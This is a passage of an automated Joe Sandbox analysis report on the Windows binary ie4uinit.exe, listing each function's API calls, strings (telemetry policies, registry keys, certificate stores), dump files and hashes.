GetProcAddress.KERNEL32(?,?,00000002,?,?,00000000,?,00007FF6B522DC05,?,?,?,?,?,7FFFFFFFFFFFFFFF,7FFFFFFFFFFFFFFF,00000000), ref: 00007FF6B522FA26
GetProcAddress.KERNEL32(?,?,00000002,?,?,00000000,?,00007FF6B522DC05,?,?,?,?,?,7FFFFFFFFFFFFFFF,7FFFFFFFFFFFFFFF,00000000), ref: 00007FF6B522FA39
FreeLibrary.KERNEL32 ref: 00007FF6B522FB7E

Strings

DisableTelemetryOptInSettingsUx, xrefs: 00007FF6B522FAFD
ConfigureTelemetryOptInChangeNotification, xrefs: 00007FF6B522FAD0
onecore\base\telemetry\permission\product\telemetrypermission.cpp, xrefs: 00007FF6B522FB8C
LimitEnhancedDiagnosticDataWindowsAnalytics, xrefs: 00007FF6B522FAB2
PolicyManager_GetPolicy, xrefs: 00007FF6B522FA1C
Software\Policies\Microsoft\Windows\DataCollection, xrefs: 00007FF6B522FB14
DisableTelemetryOptInChangeNotification, xrefs: 00007FF6B522FAE4
ConfigureTelemetryOptInSettingsUx, xrefs: 00007FF6B522FA6D, 00007FF6B522FAB9
policymanager.dll, xrefs: 00007FF6B522F9F7
System, xrefs: 00007FF6B522FA77
PolicyManager_FreeGetPolicyData, xrefs: 00007FF6B522FA2C

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: AddressLibraryProc$FreeLoad
String ID: ConfigureTelemetryOptInChangeNotification$ConfigureTelemetryOptInSettingsUx$DisableTelemetryOptInChangeNotification$DisableTelemetryOptInSettingsUx$LimitEnhancedDiagnosticDataWindowsAnalytics$PolicyManager_FreeGetPolicyData$PolicyManager_GetPolicy$Software\Policies\Microsoft\Windows\DataCollection$System$onecore\base\telemetry\permission\product\telemetrypermission.cpp$policymanager.dll
API String ID: 2256533930-1386432056
Opcode ID: 1be8aeec32eaafe52004e8364c04f33708575598bd7df91e6ee20870cfc2c023
Instruction ID: 3e3e1c6e78498e8fc59da2ef1855935f878159c1fd1bd16e41181e681d1907d6
Opcode Fuzzy Hash: 1be8aeec32eaafe52004e8364c04f33708575598bd7df91e6ee20870cfc2c023
Instruction Fuzzy Hash: 71515AA5A1A74289EB249F299E543F523A1BB48F94F404135DE0EC779EEF3DE8498340

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B522AD28 Relevance: 30.2, APIs: 20, Instructions: 181fileCOMMON

Download Yara Rule

APIs

UnmapViewOfFile.KERNEL32(?,?,?,?,?,?,00000000,00007FF6B522B3AD), ref: 00007FF6B522AD99
GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00007FF6B522B3AD), ref: 00007FF6B522ADAD
GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00007FF6B522B3AD), ref: 00007FF6B522ADBD
GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00007FF6B522B3AD), ref: 00007FF6B522ADCD
CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,00007FF6B522B3AD), ref: 00007FF6B522ADFF
GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00007FF6B522B3AD), ref: 00007FF6B522AE13
GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00007FF6B522B3AD), ref: 00007FF6B522AE23
GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00007FF6B522B3AD), ref: 00007FF6B522AE33
CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,00007FF6B522B3AD), ref: 00007FF6B522AE66
GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00007FF6B522B3AD), ref: 00007FF6B522AE7A
GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00007FF6B522B3AD), ref: 00007FF6B522AE8A
GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00007FF6B522B3AD), ref: 00007FF6B522AE9A
CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,00007FF6B522B3AD), ref: 00007FF6B522AECC
GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00007FF6B522B3AD), ref: 00007FF6B522AEE0
GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00007FF6B522B3AD), ref: 00007FF6B522AEF0
GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00007FF6B522B3AD), ref: 00007FF6B522AF00
CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,00007FF6B522B3AD), ref: 00007FF6B522AF2E
GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00007FF6B522B3AD), ref: 00007FF6B522AF42
GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00007FF6B522B3AD), ref: 00007FF6B522AF52
GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00007FF6B522B3AD), ref: 00007FF6B522AF60

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: ErrorLast$CloseHandle$FileUnmapView
String ID:
API String ID: 3410133523-0
Opcode ID: e8b01738b157d96a1d51ad9e3cdd8c14ad3757a24c22c6e4bc133fb466b83468
Instruction ID: 589f1dfe4ff2aa2ac82b01d0673e45445770023cb1dd2f6d5b02e9e5785a1570
Opcode Fuzzy Hash: e8b01738b157d96a1d51ad9e3cdd8c14ad3757a24c22c6e4bc133fb466b83468
Instruction Fuzzy Hash: 4271AE59B1BB4686FB605FAA9FC43B92294BF08F41F440138CB1AC659ADFBEFC455210

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B522F540 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 123registryencryptionCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6B5230A8C: GetModuleFileNameW.KERNEL32 ref: 00007FF6B5230AC2
Part of subcall function 00007FF6B5230A8C: _wcsicmp.MSVCRT ref: 00007FF6B5230AE7

#690.IERTUTIL ref: 00007FF6B522F5A1
wcsncmp.MSVCRT ref: 00007FF6B522F5C1
RegOpenKeyExW.ADVAPI32 ref: 00007FF6B522F5F0
RegCreateKeyExW.ADVAPI32 ref: 00007FF6B522F62F
CertOpenStore.CRYPT32 ref: 00007FF6B522F655
GetLastError.KERNEL32 ref: 00007FF6B522F667
GetLastError.KERNEL32 ref: 00007FF6B522F676
RegCloseKey.ADVAPI32 ref: 00007FF6B522F69E
RegCloseKey.ADVAPI32 ref: 00007FF6B522F6A9
CertOpenStore.CRYPT32 ref: 00007FF6B522F6CF
GetLastError.KERNEL32 ref: 00007FF6B522F6E1
GetLastError.KERNEL32 ref: 00007FF6B522F6F0
GetLastError.KERNEL32 ref: 00007FF6B522F6FF

Strings

HKCU\, xrefs: 00007FF6B522F5B5
HistoryJournalCertificate, xrefs: 00007FF6B522F60E
MSIEHistoryJournal, xrefs: 00007FF6B522F6B4

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: ErrorLast$Open$CertCloseStore$#690CreateFileModuleName_wcsicmpwcsncmp
String ID: HKCU\$HistoryJournalCertificate$MSIEHistoryJournal
API String ID: 2454733814-1739054375
Opcode ID: 34361da2126696112a88f8a12165d097abf9b6d2354067e74d23ecbe089b6cea
Instruction ID: 9f87ba43e9a9cbdb8f9d9c4927cfeb9583832c41edde0e52afdefa2354d0b0db
Opcode Fuzzy Hash: 34361da2126696112a88f8a12165d097abf9b6d2354067e74d23ecbe089b6cea
Instruction Fuzzy Hash: B251B465B1AB8286FB608B29EE807AA7394EF84F40F404134DB4DC266DDF7CE8098700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B5230880 Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 132memoryCOMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeExW.VERSION(?,?,?,?,?,?,?,?,00007FF6B5215599), ref: 00007FF6B52308C5
LocalAlloc.KERNEL32(?,?,?,?,?,?,?,?,00007FF6B5215599), ref: 00007FF6B52308DE
GetFileVersionInfoExW.VERSION(?,?,?,?,?,?,?,?,00007FF6B5215599), ref: 00007FF6B5230904
VerQueryValueW.VERSION(?,?,?,?,?,?,?,?,00007FF6B5215599), ref: 00007FF6B523092A
StrTrimW.SHLWAPI(?,?,?,?,?,?,?,?,00007FF6B5215599), ref: 00007FF6B5230A3B

Part of subcall function 00007FF6B5211394: _vsnwprintf.MSVCRT ref: 00007FF6B52113D4

VerQueryValueW.VERSION(?,?,?,?,?,?,?,?,00007FF6B5215599), ref: 00007FF6B523097C
VerQueryValueW.VERSION(?,?,?,?,?,?,?,?,00007FF6B5215599), ref: 00007FF6B52309B1
VerQueryValueW.VERSION(?,?,?,?,?,?,?,?,00007FF6B5215599), ref: 00007FF6B52309E2
VerQueryValueW.VERSION(?,?,?,?,?,?,?,?,00007FF6B5215599), ref: 00007FF6B5230A13
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,00007FF6B5215599), ref: 00007FF6B5230A5C

Strings

\StringFileInfo\040904B0\%s, xrefs: 00007FF6B523098D
FileVersion, xrefs: 00007FF6B523093C
\VarFileInfo\Translation, xrefs: 00007FF6B5230923
\StringFileInfo\04090000\%s, xrefs: 00007FF6B52309EF
\StringFileInfo\%04X%04X\%s, xrefs: 00007FF6B523094C
\StringFileInfo\040904E4\%s, xrefs: 00007FF6B52309BE

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: QueryValue$FileInfoLocalVersion$AllocFreeSizeTrim_vsnwprintf
String ID: FileVersion$\StringFileInfo\%04X%04X\%s$\StringFileInfo\04090000\%s$\StringFileInfo\040904B0\%s$\StringFileInfo\040904E4\%s$\VarFileInfo\Translation
API String ID: 386413036-2944779872
Opcode ID: d2fa5ca200306b7d4b1d8c421c51bec2d7dacae2eba604211984a6efdc1e01ff
Instruction ID: 6c013a01856a88a27bc8c2beab24ce4cd46b401b41f59940367f273a383a9d82
Opcode Fuzzy Hash: d2fa5ca200306b7d4b1d8c421c51bec2d7dacae2eba604211984a6efdc1e01ff
Instruction Fuzzy Hash: 1E518022B1AA4699E7609F65EE005EA7364FB48F84F505032EF4E97A6DDE3CD90DC700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B5215E58 Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 105COMMON

Download Yara Rule

APIs

CompareStringOrdinal.KERNEL32 ref: 00007FF6B5215EAF
memset.MSVCRT ref: 00007FF6B5215ECD
memset.MSVCRT ref: 00007FF6B5215EDD
swscanf_s.MSVCRT ref: 00007FF6B5215F34
CompareStringOrdinal.KERNEL32 ref: 00007FF6B5215F6D
StrStrW.SHLWAPI ref: 00007FF6B5215F86
ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF6B5215FC8
fgetws.MSVCRT ref: 00007FF6B5215FFC
fclose.MSVCRT ref: 00007FF6B521600E

Strings

"%%windir%%\System32\dism.exe" /online /remove-package /packagename:%s, xrefs: 00007FF6B5215F9D
(, xrefs: 00007FF6B5215F12
VER_IEMAJORVERSION.2, xrefs: 00007FF6B5215F78
', xrefs: 00007FF6B5215EE8
Microsoft-Windows-InternetExplorer-Package-TopLevel, xrefs: 00007FF6B5215EA8
%%%us | %%%us, xrefs: 00007FF6B5215EF0
Superseded, xrefs: 00007FF6B5215F66

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: CompareOrdinalStringmemset$EnvironmentExpandStringsfclosefgetwsswscanf_s
String ID: "%%windir%%\System32\dism.exe" /online /remove-package /packagename:%s$%%%us | %%%us$'$($Microsoft-Windows-InternetExplorer-Package-TopLevel$Superseded$VER_IEMAJORVERSION.2
API String ID: 3568001790-1226670232
Opcode ID: 3fb980c3e0f037b13c59d51143b5157cbb4791bf65fd9feb2f53475f35883871
Instruction ID: 8b47dd849eef272d27015112c927afe4acfb60b1e45a345f85c6260bbf7b68f3
Opcode Fuzzy Hash: 3fb980c3e0f037b13c59d51143b5157cbb4791bf65fd9feb2f53475f35883871
Instruction Fuzzy Hash: 59416432B1565299E730CF28DD406EA2365FB55B48F804032DB4D87A4EDF3DEA05CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B5217268 Relevance: 26.4, APIs: 2, Strings: 13, Instructions: 151windowthreadCOMMON

Download Yara Rule

APIs

FormatMessageW.KERNEL32 ref: 00007FF6B5217349
GetCurrentThreadId.KERNEL32 ref: 00007FF6B52173C2

Part of subcall function 00007FF6B52171E8: _vsnwprintf.MSVCRT ref: 00007FF6B5217220

Strings

, xrefs: 00007FF6B521740F
Msg:[%ws] , xrefs: 00007FF6B521742A
[%hs], xrefs: 00007FF6B5217485
[%hs(%hs)], xrefs: 00007FF6B521746C
ReturnHr, xrefs: 00007FF6B521730B
FailFast, xrefs: 00007FF6B52172F9
%hs!%p: , xrefs: 00007FF6B521738D
LogHr, xrefs: 00007FF6B5217302
Exception, xrefs: 00007FF6B5217314
CallContext:[%hs] , xrefs: 00007FF6B5217445
%hs(%d) tid(%x) %08X %ws, xrefs: 00007FF6B52173D5
%hs(%d)\%hs!%p: , xrefs: 00007FF6B521736F
(caller: %p) , xrefs: 00007FF6B52173AD

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: CurrentFormatMessageThread_vsnwprintf
String ID: $%hs!%p: $%hs(%d) tid(%x) %08X %ws$%hs(%d)\%hs!%p: $(caller: %p) $CallContext:[%hs] $Exception$FailFast$LogHr$Msg:[%ws] $ReturnHr$[%hs(%hs)]$[%hs]
API String ID: 223436642-2849347638
Opcode ID: 54ef88921a4e0465f85e18d127ba9794366c6ffde68417d12abea57b28f0224c
Instruction ID: 7edb684948f863b1186ff3caefb8ef0fc391c5418e588292d2037be2c6b284c6
Opcode Fuzzy Hash: 54ef88921a4e0465f85e18d127ba9794366c6ffde68417d12abea57b28f0224c
Instruction Fuzzy Hash: 99614861E0AA5285EB25DF59EE005EA63A0BF88F84F480136DF4D9779EDF7DE9408700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B522BB7C Relevance: 25.8, APIs: 17, Instructions: 286fileCOMMON

Download Yara Rule

APIs

GetFileSizeEx.KERNEL32 ref: 00007FF6B522BCB7
GetLastError.KERNEL32 ref: 00007FF6B522BCC1
GetLastError.KERNEL32 ref: 00007FF6B522BCD4
SetFilePointer.KERNEL32 ref: 00007FF6B522BD12
GetLastError.KERNEL32 ref: 00007FF6B522BD1D
GetLastError.KERNEL32 ref: 00007FF6B522BD2C
GetLastError.KERNEL32 ref: 00007FF6B522BD39
SetEndOfFile.KERNEL32 ref: 00007FF6B522BD5D
GetLastError.KERNEL32 ref: 00007FF6B522BD67
GetLastError.KERNEL32 ref: 00007FF6B522BD76
GetLastError.KERNEL32 ref: 00007FF6B522BD83
FlushFileBuffers.KERNEL32 ref: 00007FF6B522BDAF
CreateFileMappingW.KERNEL32 ref: 00007FF6B522BDE5
#50.IERTUTIL ref: 00007FF6B522BDFE
MapViewOfFile.KERNEL32 ref: 00007FF6B522BE30
memset.MSVCRT ref: 00007FF6B522BE4E
GetLastError.KERNEL32 ref: 00007FF6B522BF83

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: ErrorLast$File$BuffersCreateFlushMappingPointerSizeViewmemset
String ID:
API String ID: 804094210-0
Opcode ID: 2ff7b0256f059532388c2e18e71e07a70d5519942173f3ce971e031d846027c7
Instruction ID: b5f6d2fc060dbd30810ac203c6a78f3db6836c49e56bb2a7256a36e85a4cb44b
Opcode Fuzzy Hash: 2ff7b0256f059532388c2e18e71e07a70d5519942173f3ce971e031d846027c7
Instruction Fuzzy Hash: 96C1B4BA71A75286E720CF19AA847A976E8FF48B54F104139DB4DC3759DF3DE8418B00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B5221464 Relevance: 24.7, APIs: 8, Strings: 6, Instructions: 194COMMON

Download Yara Rule

APIs

StrCmpNIW.SHLWAPI ref: 00007FF6B5221503
wcsncpy_s.MSVCRT ref: 00007FF6B5221630
UrlUnescapeW.SHLWAPI ref: 00007FF6B5221649
SysFreeString.OLEAUT32 ref: 00007FF6B522168B
StrCmpNIW.SHLWAPI ref: 00007FF6B52216B1
StrStrIW.SHLWAPI ref: 00007FF6B52216C4
SysFreeString.OLEAUT32 ref: 00007FF6B5221714
SysFreeString.OLEAUT32 ref: 00007FF6B522171F

Part of subcall function 00007FF6B5224EB4: CreateIUriBuilder.URLMON(?,00000000,?,00007FF6B522170F), ref: 00007FF6B5224F1B
Part of subcall function 00007FF6B5224EB4: UrlEscapeW.SHLWAPI(?,00000000,?,00007FF6B522170F), ref: 00007FF6B5224F46

Strings

EUPP, xrefs: 00007FF6B52216CF
bing., xrefs: 00007FF6B52214BE
EUPP_, xrefs: 00007FF6B52216A7
_EUPP_, xrefs: 00007FF6B52216BA
%s_%s, xrefs: 00007FF6B52216DB
msn., xrefs: 00007FF6B52214A8

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: FreeString$BuilderCreateEscapeUnescapewcsncpy_s
String ID: %s_%s$EUPP$EUPP_$_EUPP_$bing.$msn.
API String ID: 1570689176-4073838992
Opcode ID: 0c2213bee666b21428313772bd6865f15e2349cbc810c6156c9bb1336e9ba057
Instruction ID: cee9c6b89a6ce9e299866c515abca6824bde91d64c142fc5e57c55b45fc73349
Opcode Fuzzy Hash: 0c2213bee666b21428313772bd6865f15e2349cbc810c6156c9bb1336e9ba057
Instruction Fuzzy Hash: 8681803661AB4286EB20DB19EA405EA67A4FB84F90F544135EF4D877ADDF3DE801C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B5221154 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 135registrymemoryCOMMON

Download Yara Rule

APIs

#57.IERTUTIL ref: 00007FF6B52211A4
ConvertSidToStringSidW.ADVAPI32 ref: 00007FF6B52211CA
SysAllocString.OLEAUT32 ref: 00007FF6B52211F0
RegOpenKeyExW.ADVAPI32 ref: 00007FF6B522122D
RegGetValueW.ADVAPI32 ref: 00007FF6B522126B
RegCloseKey.ADVAPI32 ref: 00007FF6B5221293

Part of subcall function 00007FF6B5211440: SysStringLen.OLEAUT32 ref: 00007FF6B521148B

SysStringLen.OLEAUT32 ref: 00007FF6B52212C9
memcpy_s.MSVCRT ref: 00007FF6B52212EE
SysFreeString.OLEAUT32 ref: 00007FF6B5221315
LocalFree.KERNEL32 ref: 00007FF6B5221327
LocalFree.KERNEL32 ref: 00007FF6B5221337

Strings

SOFTWARE\Microsoft\Cryptography, xrefs: 00007FF6B522121F
N/A, xrefs: 00007FF6B522129E
MachineGuid, xrefs: 00007FF6B522125D

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: String$Free$Local$AllocCloseConvertOpenValuememcpy_s
String ID: MachineGuid$N/A$SOFTWARE\Microsoft\Cryptography
API String ID: 914379026-238228221
Opcode ID: bae0a7e27a1d84dd16728a17bb357d8d9e57442cf4e0cf5843a0564b6db68750
Instruction ID: c5dcf5c63e5e3581a32c1e8d1a292d5490d439255ab212c6163e5fa76fa5c511
Opcode Fuzzy Hash: bae0a7e27a1d84dd16728a17bb357d8d9e57442cf4e0cf5843a0564b6db68750
Instruction Fuzzy Hash: AD516036A0AB4285EB249F19ED405AA73A5FB84F80F544035DF8D87B5ADF3EE845C700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B5219818 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 109memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObjectEx.KERNEL32 ref: 00007FF6B521983C
GetLastError.KERNEL32 ref: 00007FF6B5219877
CloseHandle.KERNEL32 ref: 00007FF6B5219882
SetLastError.KERNEL32 ref: 00007FF6B5219892
GetLastError.KERNEL32 ref: 00007FF6B52198A6
CloseHandle.KERNEL32 ref: 00007FF6B52198B1
SetLastError.KERNEL32 ref: 00007FF6B52198C1
GetLastError.KERNEL32 ref: 00007FF6B52198D1
ReleaseMutex.KERNEL32 ref: 00007FF6B52198DC
SetLastError.KERNEL32 ref: 00007FF6B52198EC
GetProcessHeap.KERNEL32 ref: 00007FF6B521991D
HeapFree.KERNEL32 ref: 00007FF6B521992B
ReleaseMutex.KERNEL32 ref: 00007FF6B5219939

Strings

internal\sdk\inc\wil\resource.h, xrefs: 00007FF6B52197F3, 00007FF6B521995D

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: ErrorLast$CloseHandleHeapMutexRelease$FreeObjectProcessSingleWait
String ID: internal\sdk\inc\wil\resource.h
API String ID: 1242941757-3958217256
Opcode ID: 25bb7fe6154c03916b88fc9ca83f663245538ad64c785a864ca1a9a5c79f9f2a
Instruction ID: 4c47fd056c8b232e18e9aaea7080658ec52032c5df334e815f4c83a77fce1dd3
Opcode Fuzzy Hash: 25bb7fe6154c03916b88fc9ca83f663245538ad64c785a864ca1a9a5c79f9f2a
Instruction Fuzzy Hash: A2417521E0A61646FA246B69DF853BA2294BF84F90F184434CB4EC769FDF3DEC468740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B521AE3C Relevance: 22.6, APIs: 15, Instructions: 126memoryCOMMON

Download Yara Rule

APIs

GetKernelObjectSecurity.ADVAPI32 ref: 00007FF6B521AE6E
GetLastError.KERNEL32 ref: 00007FF6B521AE7E
LocalAlloc.KERNEL32 ref: 00007FF6B521AE8F
GetKernelObjectSecurity.ADVAPI32 ref: 00007FF6B521AEBE
GetLastError.KERNEL32 ref: 00007FF6B521AEC8
GetSecurityDescriptorSacl.ADVAPI32 ref: 00007FF6B521AF04
GetAce.ADVAPI32 ref: 00007FF6B521AF2A
GetLengthSid.ADVAPI32 ref: 00007FF6B521AF54
LocalAlloc.KERNEL32 ref: 00007FF6B521AF61
GetLengthSid.ADVAPI32 ref: 00007FF6B521AF77
CopySid.ADVAPI32 ref: 00007FF6B521AF85
LocalFree.KERNEL32 ref: 00007FF6B521AF97
LocalFree.KERNEL32 ref: 00007FF6B521AFD8

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

